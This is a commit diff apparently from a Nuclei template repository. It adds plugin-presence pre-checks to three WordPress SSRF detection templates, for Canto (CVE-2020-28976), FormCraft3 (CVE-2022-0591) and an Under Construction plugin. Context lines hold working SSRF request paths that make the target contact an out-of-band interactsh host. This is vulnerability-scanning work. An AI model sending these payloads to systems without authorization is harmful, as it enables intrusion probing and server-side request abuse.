added-flow(oast)

2024-03-26 23:28:35 +05:30 · 2024-03-26 23:28:35 +05:30 · 72f30f2442
parent d1201a3f38
commit 72f30f2442
3 changed files with 40 additions and 0 deletions
--- a/http/cves/2020/CVE-2020-28976.yaml
+++ b/http/cves/2020/CVE-2020-28976.yaml
@ -30,7 +30,22 @@ info:
    framework: wordpress
  tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto

+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/canto/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - 'Canto'
+          - 'Tested up to:'
+        condition: and
+
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
--- a/http/cves/2022/CVE-2022-0591.yaml
+++ b/http/cves/2022/CVE-2022-0591.yaml
@ -30,7 +30,19 @@ info:
    fofa-query: body="formcraft3" && body="wp-"
  tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc

+flow: http(1) && http(2)
+
 http:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - '/wp-content/plugins/formcraft3/'
+
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}'
--- a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml
+++ b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml
@ -14,7 +14,20 @@ info:
    max-request: 1
  tags: ssrf,wp,wp-plugin,wordpress,unauth,wpscan,packetstorm

+flow: http(1) && http(2)
+
 http:
+  - raw:
+      - |
+        GET /wp-content/plugins/under-construction-maintenance-mode/readme.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        internal: true
+        words:
+          - '= Under Construction'
+
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/2